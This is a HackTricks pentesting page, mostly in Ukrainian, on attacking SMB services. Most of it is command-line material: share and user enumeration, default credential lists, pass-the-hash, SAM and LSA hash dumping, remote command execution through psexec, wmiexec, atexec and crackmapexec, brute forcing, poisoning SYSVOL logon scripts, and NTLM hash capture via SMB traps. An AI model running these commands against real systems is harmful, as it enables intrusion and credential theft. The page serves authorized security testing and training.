HackTricks139,445 - Pentesting SMB
Tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Port 139
Цей Network Basic Input Output System** (NetBIOS)** — це програмний протокол, створений для того, щоб дозволити додаткам, ПК і робочим станціям у локальній мережі (LAN) взаємодіяти з мережевим обладнанням та полегшувати передачу даних по мережі. Ідентифікація та визначення місцезнаходження програм, що працюють у мережі NetBIOS, здійснюється за їхніми NetBIOS-іменами, які можуть містити до 16 символів і часто відрізняються від імені комп’ютера. Сесія NetBIOS між двома додатками ініціюється, коли один додаток (що виконує роль клієнта) віддає команду «викликати» інший додаток (що виконує роль сервера) із використанням TCP Port 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Technically, Port 139 is referred to as ‘NBT over IP’, whereas Port 445 is identified as ‘SMB over IP’. The acronym SMB stands for ‘Server Message Blocks’, which is also modernly known as the Common Internet File System (CIFS). As an application-layer network protocol, SMB/CIFS is primarily utilized to enable shared access to files, printers, serial ports, and facilitate various forms of communication between nodes on a network.
For example, in the context of Windows, it is highlighted that SMB can operate directly over TCP/IP, eliminating the necessity for NetBIOS over TCP/IP, through the utilization of port 445. Conversely, on different systems, the employment of port 139 is observed, indicating that SMB is being executed in conjunction with NetBIOS over TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Протокол Server Message Block (SMB), що працює за моделлю client-server, призначений для регулювання доступу до файлів, каталогів та інших мережевих ресурсів, таких як принтери й роутери. Переважно використовується в сімействі операційних систем Windows; SMB забезпечує зворотну сумісність, дозволяючи пристроям з новішими версіями ОС Microsoft безперешкодно взаємодіяти з тими, що працюють на старіших версіях. Крім того, проект Samba пропонує вільне програмне забезпечення для реалізації SMB на системах Linux і Unix, що полегшує кросплатформену комунікацію через SMB.
Shares, що представляють довільні частини локальної файлової системи, можуть надаватися SMB-сервером, роблячи ієрархію видимою для клієнта частково незалежно від фактичної структури сервера. Access Control Lists (ACLs), які визначають права доступу, дозволяють здійснювати детальний контроль над правами користувачів, включно з атрибутами, такими як execute, read та full access. Ці дозволи можуть призначатися окремим користувачам або групам залежно від shares і відрізняються від локальних дозволів, встановлених на сервері.
IPC$ Share
Отримати доступ до IPC$ share можна через анонімну null session, що дозволяє взаємодіяти з сервісами, відкритими через named pipes. Для цього корисна утиліта enum4linux. При правильному використанні вона дозволяє отримати:
- Інформацію про операційну систему
- Відомості про батьківський домен
- Перелік локальних користувачів і груп
- Інформацію про доступні SMB shares
- Діючу політику безпеки системи
Ця функціональність критично важлива для мережевих адміністраторів і фахівців із безпеки для оцінки рівня захищеності SMB (Server Message Block) сервісів у мережі. enum4linux дає всебічний огляд SMB-середовища цільової системи, що необхідно для виявлення потенційних вразливостей і забезпечення належного захисту SMB сервісів.
enum4linux -a target_ip
Вищенаведена команда — приклад того, як enum4linux може бути використаний для виконання повного enumeration щодо цілі, вказаної як target_ip.
Що таке NTLM
Якщо ви не знаєте, що таке NTLM або хочете дізнатися, як він працює і як ним зловживати, вам буде дуже цікава ця сторінка про NTLM, де пояснюється як працює цей протокол і як ви можете ним скористатися:
Перерахування серверів
Scan мережі для пошуку хостів:
nbtscan -r 192.168.0.1/24
Версія SMB-сервера
Щоб шукати можливі експлойти для версії SMB, важливо знати, яка версія використовується. Якщо ця інформація не з’являється в інших інструментах, які ви використовуєте, ви можете:
- Використайте допоміжний модуль MSF
**auxiliary/scanner/smb/smb_version** - Або цей скрипт:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
Пошук exploit
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Можливі облікові дані
| Логін(и) | Типові паролі |
|---|---|
| (blank) | (blank) |
| guest | (blank) |
| Administrator, admin | (blank), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
Brute Force
Інформація про SMB-середовище
Отримання інформації
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Перелічити користувачів, груп і залогінених користувачів
Ця інформація вже має бути зібрана за допомогою enum4linux та enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Перерахування локальних користувачів
lookupsid.py -no-pass hostname.local
Однорядковий приклад
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Enumerate local users
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Перелічення LSARPC і SAMR rpcclient
GUI-підключення з linux
У терміналі:
xdg-open smb://cascade.htb/
У вікні файлового менеджера (nautilus, thunar, тощо)
smb://friendzone.htb/general/
Перелічення спільних папок
Перелік спільних папок
Завжди рекомендується перевірити, чи можна отримати доступ до чогось; якщо у вас немає credentials, спробуйте використовувати null credentials/guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Підключити/Перелічити спільну папку
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Ручне перерахування share’ів windows та підключення до них
Можливо, вам обмежено можливість відображати share’и на хост-машині, і коли ви намагаєтесь їх перерахувати, здається, що немає жодних share’ів для підключення. Тому варто коротко спробувати вручну підключитись до конкретного share’у. Щоб вручну перерахувати share’и, звертайте увагу на відповіді типу NT_STATUS_ACCESS_DENIED та NT_STATUS_BAD_NETWORK_NAME при використанні валідної сесії (наприклад, null session або валідні облікові дані). Вони можуть вказувати, чи існує share і ви не маєте до нього доступу, або ж share взагалі не існує.
Поширені імена share’ів для Windows-цілей:
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Поширені імена share’ів з Network Security Assessment 3rd edition)
Ви можете спробувати підключитися до них за допомогою наступної команди
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
або цей скрипт (використовуючи null session)
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
приклади
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Перерахувати спільні ресурси в Windows / без сторонніх інструментів
PowerShell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
Консоль CMD
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (графічний)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (графічний інтерфейс), введіть \\<ip>\, щоб побачити доступні неприховані спільні папки.
Монтування спільної папки
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Завантаження файлів
Прочитайте попередні розділи, щоб дізнатися, як підключатися за допомогою credentials/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Commands:
- mask: вказує маску, яка використовується для фільтрації файлів у каталозі (наприклад “” для всіх файлів)
- recurse: вмикає рекурсію (за замовчуванням: вимкнено)
- prompt: вимикає запит імен файлів (за замовчуванням: увімкнено)
- mget: копіює всі файли, що відповідають масці, з хоста на клієнтську машину
(Інформація з manpage smbclient)
Пошук загальних папок домену
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec spider.
-M spider_plus [--share <share_name>]--pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Specially interesting from shares are the files called Registry.xml as they may contain passwords for users configured with autologon via Group Policy. Or web.config files as they contains credentials.
Tip
The SYSVOL share is readable by all authenticated users in the domain. In there you may find many different batch, VBScript, and PowerShell scripts. You should check the scripts inside of it as you might find sensitive info such as passwords. Also, don’t trust automated share listings: even if a share looks read-only, the underlying NTFS ACLs may allow writes. Always test with smbclient by uploading a small file to
\\<dc>\\SYSVOL\\<domain>\\scripts\\. If writable, you can poison logon scripts for RCE at user logon.
ShareHound – OpenGraph collector for SMB shares (BloodHound)
ShareHound виявляє SMB shares у домені, обходить їх, витягує ACLs і генерує OpenGraph JSON файл для BloodHound CE/Enterprise.
- Baseline collection:
- LDAP: перелічити computer objects, прочитати
dNSHostName - DNS: отримати IP для кожного хоста
- SMB: перелічити shares на доступних хостах
- Crawl shares (BFS/DFS), перелічувати файли/папки, знімати permissions
ShareQL-driven traversal
- ShareQL — DSL за принципом first-match-wins, що дозволяє/забороняє обхід за host/share/path і встановлює per-rule max depth. Зосередьтеся на цікавих shares і обмежте рекурсію.
Example ShareQL rules
# Only crawl shares with name containing "backup", up to depth 2
allow host * share * path * depth 0
allow host * share *backup* path * depth 2
deny host * share * path *
Використання
sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" -ns "10.0.100.201" \
-rf "rules/skip_common_shares.shareql" -rf "rules/max_depth_2.shareql"
- Надайте AD creds через
-ad/-au/-ap(або використайте-adразом із-au/-ap). Використовуйте-r/-rfдля inline правил або файлів. - Вивід: JSON OpenGraph; імпортуйте в BloodHound для запитів hosts/shares/files та effective rights.
- Порада: Обмежте max depth до 1–2, якщо ваші фільтри не дуже суворі.
BloodHound attack-surface queries
- Principals з write-подібним доступом до shares
MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty|CanDsWriteExtendedProperties]->(s:NetworkShareSMB)
RETURN x
- Облікові записи з FULL_CONTROL на шарах
Cypher: облікові записи з FULL_CONTROL на шарах
```cypher MATCH (p:Principal)-[r]->(s:NetworkShareSMB) WHERE (p)-[:CanDelete]->(s) AND (p)-[:CanDsControlAccess]->(s) AND (p)-[:CanDsCreateChild]->(s) AND (p)-[:CanDsDeleteChild]->(s) AND (p)-[:CanDsDeleteTree]->(s) AND (p)-[:CanDsListContents]->(s) AND (p)-[:CanDsListObject]->(s) AND (p)-[:CanDsReadProperty]->(s) AND (p)-[:CanDsWriteExtendedProperties]->(s) AND (p)-[:CanDsWriteProperty]->(s) AND (p)-[:CanReadControl]->(s) AND (p)-[:CanWriteDacl]->(s) AND (p)-[:CanWriteOwner]->(s) RETURN p,r,s ```- Шукати конфіденційні файли за розширенням (наприклад, VMDKs)
MATCH p=(h:NetworkShareHost)-[:HasNetworkShare]->(s:NetworkShareSMB)-[:Contains*0..]->(f:File)
WHERE toLower(f.extension) = toLower(".vmdk")
RETURN p
Читання реєстру
Ви можете прочитати реєстр, використавши знайдені облікові дані. Impacket reg.py дозволяє спробувати:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Пост-експлуатація
Конфігурація за замовчуванням Samba сервера зазвичай розташована в /etc/samba/smb.conf і може містити деякі небезпечні налаштування:
| Налаштування | Опис |
|---|---|
browseable = yes | Дозволяє перераховувати доступні шари? |
read only = no | Забороняє створення та зміну файлів? |
writable = yes | Дозволяє користувачам створювати та змінювати файли? |
guest ok = yes | Дозволяє підключатися до сервісу без пароля? |
enable privileges = yes | Враховувати привілеї, призначені конкретному SID? |
create mask = 0777 | Які права мають бути присвоєні новоствореним файлам? |
directory mask = 0777 | Які права мають бути присвоєні новоствореним каталогам? |
logon script = script.sh | Який скрипт повинен виконуватися під час входу користувача? |
magic script = script.sh | Який скрипт має виконуватися, коли скрипт завершується? |
magic output = script.out | Куди має зберігатися вивід magic script? |
Команда smbstatus надає інформацію про сервер та про те, хто підключений.
Аутентифікація за допомогою Kerberos
Ви можете аутентифікуватися в Kerberos за допомогою інструментів smbclient та rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
У середовищах лише з Kerberos (NTLM відключено) спроби NTLM проти SMB можуть повертати STATUS_NOT_SUPPORTED. Усуньте поширені проблеми з Kerberos і примусово використовувати Kerberos auth:
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
Для повної настройки клієнта (генерація krb5.conf, kinit, особливості SSH GSSAPI/SPN) дивіться:
88tcp/udp - Pentesting Kerberos
Виконання команд
crackmapexec
crackmapexec може виконувати команди, використовуючи будь-який з mmcexec, smbexec, atexec, wmiexec, причому wmiexec є методом за замовчуванням. Ви можете вказати бажаний метод за допомогою параметра --exec-method:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
Обидва варіанти будуть створювати нову службу (використовуючи \pipe\svcctl через SMB) на машині жертви та використовуватимуть її для виконання чогось (psexec завантажить виконуваний файл до ADMIN$ share і smbexec вкаже на cmd.exe/powershell.exe і помістить у аргументи payload –file-less technique--).
Більше інформації про psexec and smbexec.
У kali воно знаходиться за шляхом /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Використовуючи параметр-k, ви можете аутентифікуватися за допомогою kerberos замість NTLM
wmiexec/dcomexec
Сховано запустити командний shell без запису на диск або запуску нової служби, використовуючи DCOM через port 135.
У kali він розташований у /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Використовуючи параметр-k, ви можете автентифікуватися через kerberos замість NTLM
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Виконувати команди через Task Scheduler (використовуючи \pipe\atsvc через SMB).
У kali він розташований у /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Посилання на Impacket
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
ksmbd поверхня атаки та SMB2/SMB3 protocol fuzzing (syzkaller)
Ksmbd Attack Surface And Fuzzing Syzkaller
Bruteforce облікових даних користувачів
Цього не рекомендовано — ви можете заблокувати акаунт, якщо перевищите максимально дозволену кількість спроб
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
Ця атака використовує Responder toolkit для перехоплення сеансів автентифікації SMB у внутрішній мережі та ретранслює їх на цільову машину. Якщо автентифікація успішна, це автоматично відкриє вам системну оболонку.
Більше інформації про цю атаку тут.
SMB-Trap
Бібліотека Windows URLMon.dll автоматично намагається автентифікуватися до хоста, коли сторінка намагається отримати доступ до вмісту через SMB, наприклад: img src="\\10.10.10.10\path\image.jpg"
Це відбувається за допомогою функцій:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Які використовуються деякими браузерами та інструментами (наприклад, Skype)
.png)
SMBTrap using MitMf
.png)
NTLM Theft
Подібно до SMB Trapping, розміщення шкідливих файлів на цільовій системі (наприклад, через SMB) може викликати спробу автентифікації SMB, дозволяючи перехопити хеш NetNTLMv2 за допомогою інструменту, такого як Responder. Хеш потім можна зламати офлайн або використати в SMB relay attack.
HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
Посилання
- NetExec (CME) wiki – використання Kerberos
- Pentesting Kerberos (88) – налаштування клієнта та усунення несправностей
- ShareHound (collector)
- ShareQL (DSL)
Tip
Вивчайте та практикуйте AWS Hacking:
Вивчайте та практикуйте GCP Hacking:Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.